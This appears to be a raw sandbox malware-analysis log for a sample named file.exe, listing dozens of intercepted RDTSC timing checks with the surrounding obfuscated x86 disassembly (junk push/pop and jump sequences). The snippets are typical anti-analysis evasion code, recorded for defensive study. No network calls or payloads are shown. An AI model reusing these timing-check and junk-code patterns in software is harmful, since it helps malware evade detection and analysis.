Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1EADD second address: F1EB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4A4CE02A2Ah 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F4A4CE02A32h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1EB0C second address: F1EB3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4A4CCE8436h 0x00000008 js 00007F4A4CCE8426h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4A4CCE842Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1EC3B second address: F1EC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F273AB second address: F273C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE842Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a js 00007F4A4CCE8426h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2665D second address: F2666C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4A4CE02A26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2666C second address: F26670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2679C second address: F267AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F4A4CE02A26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F267AC second address: F267BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop eax 0x00000008 js 00007F4A4CCE8436h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F267BE second address: F267C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2694E second address: F26953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F26953 second address: F2695A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F26D64 second address: F26D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CCE8433h 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F26D84 second address: F26D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4A4CE02A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F26D8E second address: F26DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE8437h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F27082 second address: F27088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F27088 second address: F2708C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2708C second address: F2709C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F4A4CE02A26h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2709C second address: F270A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4A4CCE8426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F270A6 second address: F270CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4A4CE02A32h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F4A4CE02A26h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F270CB second address: F270D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F270D5 second address: F270DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F270DC second address: F270F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4A4CCE8426h 0x0000000a popad 0x0000000b push eax 0x0000000c jg 00007F4A4CCE8426h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2A79C second address: F2A7BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4A4CE02A30h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2CC48 second address: F2CC62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F4A4CCE8426h 0x00000010 jmp 00007F4A4CCE842Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2CC62 second address: F2CC66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2CC66 second address: F2CC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4A4CCE8426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F4A4CCE843Ch 0x00000015 jmp 00007F4A4CCE8436h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB8161 second address: EB816B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34D58 second address: F34D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34D5C second address: F34D6A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4A4CE02A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34D6A second address: F34D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34D6E second address: F34DA2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4A4CE02A26h 0x00000008 jmp 00007F4A4CE02A39h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 popad 0x00000014 jbe 00007F4A4CE02A46h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33CA5 second address: F33CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F4A4CCE8436h 0x0000000b jmp 00007F4A4CCE8433h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jc 00007F4A4CCE8426h 0x00000019 push esi 0x0000001a pop esi 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F4A4CCE8434h 0x00000026 pop ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33CFD second address: F33D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34696 second address: F3469E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3469E second address: F346B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F4A4CE02A32h 0x0000000b js 00007F4A4CE02A26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38258 second address: F38262 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38262 second address: F38266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38266 second address: F3826C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3826C second address: F38281 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F4A4CE02A30h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFF046 second address: EE145F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4A4CCE8438h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sbb dx, 2F1Bh 0x00000010 call dword ptr [ebp+1244C056h] 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007F4A4CCE842Eh 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFF686 second address: EFF68B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFF68B second address: EFF691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFF921 second address: EFF925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFFA13 second address: EFFA37 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F4A4CCE8437h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFFB00 second address: EFFB43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4A4CE02A2Bh 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D223Dh], ebx 0x00000016 push 00000004h 0x00000018 and ch, 00000000h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4A4CE02A35h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F001D2 second address: F001D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F002B8 second address: EE201C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007F4A4CE02A2Ah 0x0000000d nop 0x0000000e mov dword ptr [ebp+1244C0D3h], edi 0x00000014 lea eax, dword ptr [ebp+12480D17h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F4A4CE02A28h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 push eax 0x00000035 jmp 00007F4A4CE02A2Bh 0x0000003a mov dword ptr [esp], eax 0x0000003d mov edi, dword ptr [ebp+122D39B8h] 0x00000043 call dword ptr [ebp+1244C0C6h] 0x00000049 jp 00007F4A4CE02A31h 0x0000004f jmp 00007F4A4CE02A2Bh 0x00000054 push eax 0x00000055 push edx 0x00000056 jnl 00007F4A4CE02A2Ch 0x0000005c push ecx 0x0000005d push esi 0x0000005e pop esi 0x0000005f pop ecx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE201C second address: EE2039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A4CCE8437h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE2039 second address: EE203D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB30F2 second address: EB30F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38552 second address: F38558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38558 second address: F3856F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d popad 0x0000000e push edx 0x0000000f jo 00007F4A4CCE8432h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3856F second address: F38575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38800 second address: F38811 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jo 00007F4A4CCE8441h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38811 second address: F38815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38EA7 second address: F38EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F4A4CCE8426h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3F640 second address: F3F644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3F644 second address: F3F678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CCE8437h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F4A4CCE8433h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3E14E second address: F3E161 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4A4CE02A2Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3E592 second address: F3E5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F4A4CCE842Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4A4CCE8436h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3E755 second address: F3E759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3ED06 second address: F3ED12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F4A4CCE8426h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3ED12 second address: F3ED1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3ED1E second address: F3ED28 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4A4CCE8426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3EE8C second address: F3EE9F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4A4CE02A2Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3EE9F second address: F3EEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3F4C1 second address: F3F4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4A4CE02A30h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4A4CE02A37h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F449A3 second address: F449A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F449A9 second address: F449AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F471FD second address: F47207 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4A4CCE8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB76E second address: EBB783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A2Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB783 second address: EBB79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CCE8433h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB79C second address: EBB7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB7A2 second address: EBB7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F4A4CCE8426h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB7B1 second address: EBB7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB7B5 second address: EBB7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CCE842Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4A4CCE842Ah 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F4A4CCE8436h 0x0000001d popad 0x0000001e pushad 0x0000001f jnl 00007F4A4CCE8426h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB7FD second address: EBB81C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F4A4CE02A39h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EBB81C second address: EBB820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4B5A5 second address: F4B5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F4BA2D second address: F4BA32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFFCF5 second address: EFFCF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFFCF9 second address: EFFCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFFCFF second address: EFFD06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFFD06 second address: EFFD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F4A4CCE8428h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sbb cl, 0000003Ah 0x00000025 mov ecx, edx 0x00000027 mov ebx, dword ptr [ebp+12480D56h] 0x0000002d mov dh, 5Eh 0x0000002f add eax, ebx 0x00000031 jbe 00007F4A4CCE8429h 0x00000037 and cl, 0000003Ch 0x0000003a nop 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e push esi 0x0000003f pop esi 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFFD4B second address: EFFDA6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F4A4CE02A2Fh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F4A4CE02A28h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000004h 0x0000002a mov dword ptr [ebp+122D313Bh], eax 0x00000030 mov cx, 4D81h 0x00000034 nop 0x00000035 pushad 0x00000036 pushad 0x00000037 jmp 00007F4A4CE02A30h 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFFDA6 second address: EFFDB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFFDB4 second address: EFFDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFFDB8 second address: EFFDBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFFDBE second address: EFFDD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A4CE02A2Eh 0x00000009 rdtsc
